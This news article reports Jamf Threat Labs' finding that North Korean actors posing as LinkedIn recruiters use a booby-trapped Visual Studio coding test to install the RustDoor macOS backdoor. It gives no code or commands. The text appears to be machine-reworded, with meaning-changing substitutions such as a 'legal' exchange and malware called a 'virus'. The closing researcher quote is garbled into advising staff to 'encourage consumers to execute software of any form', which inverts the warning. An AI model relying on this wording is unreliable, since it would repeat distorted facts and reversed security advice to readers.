North Korean Hackers Target Cryptocurrency Users on LinkedIn with RustDoor Malware

Cybersecurity experts are continuing to warn about North Korean threat actors' efforts to target potential victims on LinkedIn to deploy malware nicknamed RustDoor.

The new caution comes from Jamf Threat Labs, which claimed it identified an attack attempt in which a user was approached on the professional social network by pretending to be a recruiter for a legal decentralized cryptocurrency exchange (DEX) named STON.fi.

The malicious cyber activity is part of a multi-pronged operation conducted by cyber threat actors sponsored by the Democratic People's Republic of Korea (DPRK) to access networks of interest under the guise of conducting interviews or coding assignments.

The financial and cryptocurrency industries are among the top targets for the state-sponsored enemies aiming to produce illegal profits and satisfy an ever-evolving set of goals depending on the regime's interests.

These assaults materialize in the form of "highly tailored, difficult-to-detect social engineering campaigns" directed against workers of decentralized finance ("DeFi"), bitcoin, and related enterprises, as recently emphasized by the U.S. Federal Bureau of Investigation (FBI) in an alert.

One of the noticeable symptoms of North Korean social engineering activities pertains to requests to run code or download software on company-owned devices, or devices that have access to a company's internal network.

Another feature worth noticing is that such assaults also contain "requests to conduct a 'pre-employment test' or debugging exercise that involves executing non-standard or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories."

Instances exhibiting similar approaches have been frequently recorded in recent weeks, demonstrating a constant development of the instruments utilized in these efforts against targets.

The latest attack chain detected by Jamf entails tricking the victim into downloading a booby-trapped Visual Studio project as part of a purported coding challenge that embeds within it bash commands to download two different second-stage payloads ("VisualStudioHelper" and "zsh_env") with identical functionality.

This stage two virus is RustDoor, which the business is monitoring as Thiefbucket. As of writing, none of the anti-malware engines have recognized the compressed coding test file as dangerous. It was posted to the VirusTotal portal on August 7, 2024.

"The config files embedded within the two separate malware samples shows that the VisualStudioHelper will persist via cron while zsh_env will persist via the zshrc file," researchers Jaron Bradley and Ferdous Saljooki wrote.

RustDoor, a macOS backdoor, was initially identified by Bitdefender in February 2024 in conjunction with a malware operation targeting bitcoin organizations. A further examination by S2W found a Golang variation named GateDoor that's aimed for attacking Windows computers.

The discoveries from Jamf are important, not only because they signal the first time the virus has been publicly traced to North Korean threat actors, but also for the fact that the malware is built in Objective-C.

"The tactics and techniques used [in the campaign] correlate very closely to what the FBI as well as many others in the industry are seeing," Jaron Bradley, Director at Jamf Threat Labs, told The Hacker News.

"Much of the targets, techniques, and objectives of the discussed attack align closely to other cyber activity coming from the DPRK over the past couple years (Operation Dream Job, RustBucket)."

VisualStudioHelper is also meant to operate as an information stealer by collecting files specified in the settings, but only after requiring the user to enter their system password by disguising it as if it's emanating from the Visual Studio software to avoid raising suspicion.

Both the payloads, however, function as a backdoor and utilize two distinct servers for command-and-control (C2) interactions.

"Threat actors continue to remain vigilant in finding new ways to pursue those in the crypto industry," the researchers stated. "It's crucial to teach your personnel, particularly your engineers, to be wary to trust folks who connect on social media and encourage consumers to execute software of any form.

"These social engineering schemes performed by the DPRK come from those who are well-versed in English and enter the conversation having well researched their target."

(The article was modified after publication to incorporate further replies from Jamf.)